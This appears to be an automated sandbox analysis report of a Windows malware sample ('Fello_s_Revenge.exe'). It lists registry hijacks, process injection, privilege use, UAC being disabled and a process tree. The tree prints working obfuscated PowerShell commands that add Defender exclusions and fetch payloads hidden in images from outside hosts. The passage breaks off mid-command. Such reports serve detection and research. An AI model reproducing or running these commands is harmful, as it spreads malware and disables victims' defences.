Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment"	Kgamnded.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment"	Mahnhhod.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32	Mblcnj32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Dgcaaddl.dll"	Nbcjnilj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Kalhafbk.dll"	Nknobkje.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment"	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment"	Jnhpoamf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment"	Knbbep32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32	Kgamnded.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Ddnnfbmk.dll"	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32	Jnhpoamf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Ddhmmpnk.dll"	Mahnhhod.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Peehmbji.dll"	Mblcnj32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Lndigcej.dll"	Iakiia32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Ejjlbppk.dll"	Ihgnkkbd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Cobhcgin.dll"	Kgamnded.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32	Ikcmbfcj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment"	Ikcmbfcj.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5832	schtasks.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
3608	powershell.exe
3608	powershell.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
2968	powershell.exe
1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
3688	c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe
3688	c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeDebugPrivilege	4300	1955e7fe3c25216101d012eb0b33f527.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2184 wrote to memory of 3608	2184	Fello_s_Revenge.exe	82
PID 2184 wrote to memory of 3608	2184	Fello_s_Revenge.exe	82
PID 2184 wrote to memory of 3608	2184	Fello_s_Revenge.exe	82
PID 2184 wrote to memory of 2968	2184	Fello_s_Revenge.exe	84
PID 2184 wrote to memory of 2968	2184	Fello_s_Revenge.exe	84
PID 2184 wrote to memory of 2968	2184	Fello_s_Revenge.exe	84
PID 2184 wrote to memory of 620	2184	Fello_s_Revenge.exe	86
PID 2184 wrote to memory of 620	2184	Fello_s_Revenge.exe	86
PID 2184 wrote to memory of 620	2184	Fello_s_Revenge.exe	86
PID 2184 wrote to memory of 668	2184	Fello_s_Revenge.exe	87
PID 2184 wrote to memory of 668	2184	Fello_s_Revenge.exe	87
PID 2184 wrote to memory of 668	2184	Fello_s_Revenge.exe	87
PID 2184 wrote to memory of 784	2184	Fello_s_Revenge.exe	88
PID 2184 wrote to memory of 784	2184	Fello_s_Revenge.exe	88
PID 2184 wrote to memory of 784	2184	Fello_s_Revenge.exe	88
PID 2184 wrote to memory of 2072	2184	Fello_s_Revenge.exe	89
PID 2184 wrote to memory of 2072	2184	Fello_s_Revenge.exe	89
PID 2184 wrote to memory of 2072	2184	Fello_s_Revenge.exe	89
PID 784 wrote to memory of 4056	784	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe	90
PID 784 wrote to memory of 4056	784	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe	90
PID 784 wrote to memory of 4056	784	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe	90
PID 2184 wrote to memory of 4300	2184	Fello_s_Revenge.exe	91
PID 2184 wrote to memory of 4300	2184	Fello_s_Revenge.exe	91
PID 2184 wrote to memory of 4300	2184	Fello_s_Revenge.exe	91
PID 4056 wrote to memory of 3396	4056	Iakiia32.exe	92
PID 4056 wrote to memory of 3396	4056	Iakiia32.exe	92
PID 4056 wrote to memory of 3396	4056	Iakiia32.exe	92
PID 668 wrote to memory of 440	668	5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe	93
PID 668 wrote to memory of 440	668	5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe	93
PID 3396 wrote to memory of 3884	3396	Ikcmbfcj.exe	94
PID 3396 wrote to memory of 3884	3396	Ikcmbfcj.exe	94
PID 3396 wrote to memory of 3884	3396	Ikcmbfcj.exe	94
PID 2184 wrote to memory of 1200	2184	Fello_s_Revenge.exe	95
PID 2184 wrote to memory of 1200	2184	Fello_s_Revenge.exe	95
PID 2184 wrote to memory of 1200	2184	Fello_s_Revenge.exe	95
PID 2184 wrote to memory of 1164	2184	Fello_s_Revenge.exe	96
PID 2184 wrote to memory of 1164	2184	Fello_s_Revenge.exe	96
PID 2184 wrote to memory of 1164	2184	Fello_s_Revenge.exe	96
PID 3884 wrote to memory of 4240	3884	Ihgnkkbd.exe	97
PID 3884 wrote to memory of 4240	3884	Ihgnkkbd.exe	97
PID 3884 wrote to memory of 4240	3884	Ihgnkkbd.exe	97
PID 2184 wrote to memory of 3172	2184	Fello_s_Revenge.exe	98
PID 2184 wrote to memory of 3172	2184	Fello_s_Revenge.exe	98
PID 2184 wrote to memory of 3172	2184	Fello_s_Revenge.exe	98
PID 4240 wrote to memory of 1452	4240	Jnhpoamf.exe	99
PID 4240 wrote to memory of 1452	4240	Jnhpoamf.exe	99
PID 4240 wrote to memory of 1452	4240	Jnhpoamf.exe	99
PID 1200 wrote to memory of 820	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	9
PID 1200 wrote to memory of 828	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	10
PID 1200 wrote to memory of 572	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	13
PID 1200 wrote to memory of 2992	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	49
PID 1200 wrote to memory of 3028	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	50
PID 1200 wrote to memory of 3296	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	52
PID 1200 wrote to memory of 3428	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	53
PID 1200 wrote to memory of 3744	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	55
PID 1200 wrote to memory of 3768	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	56
PID 1200 wrote to memory of 3860	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	57
PID 1200 wrote to memory of 3920	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	58
PID 1200 wrote to memory of 3980	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	59
PID 1200 wrote to memory of 4008	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	60
PID 1200 wrote to memory of 4292	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	61
PID 1200 wrote to memory of 1072	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	77
PID 1200 wrote to memory of 1708	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	78
PID 1200 wrote to memory of 1240	1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe	80

System policy modification 1 TTPs 1 IoCs

defense_evasion

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe

C:\Windows\system32\fontdrvhost.exe
"fontdrvhost.exe"
1⤵
PID:820

C:\Windows\system32\fontdrvhost.exe
"fontdrvhost.exe"
1⤵
PID:828

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:572

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3028

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3296
- C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Fello_s_Revenge.exe
  "C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Fello_s_Revenge.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2184
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAaQB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHQAagBsACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAWQBPAFUAJwAnAFIARQAgAEMATwBPAEsARQBEACAATwBOAEMARQAgAEEARwBBAEkATgAgAEIAWQAgAEYANdhs3DXYKd012CndbwAgAEwATQBBAE8AIQAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAHUAZgAjAD4A"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3608
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:420
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbQB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAbABsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAcwB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcwBxACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2968
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3484
- - C:\Users\Admin\AppData\Local\Temp\0d4c465488b6f5f760e98a15d77da181419223fdd93915e0fb90646c645b7766.exe
    "C:\Users\Admin\AppData\Local\Temp\0d4c465488b6f5f760e98a15d77da181419223fdd93915e0fb90646c645b7766.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:620
- - C:\Users\Admin\AppData\Local\Temp\5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe
    "C:\Users\Admin\AppData\Local\Temp\5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:668
  - - C:\Users\Admin\AppData\Roaming\Morfey.EXE
      C:\Users\Admin\AppData\Roaming\Morfey.EXE
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:440
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c grw.vbs
        5⤵
        
        PID:656
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\grw.vbs"
        6⤵
        
        PID:6016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#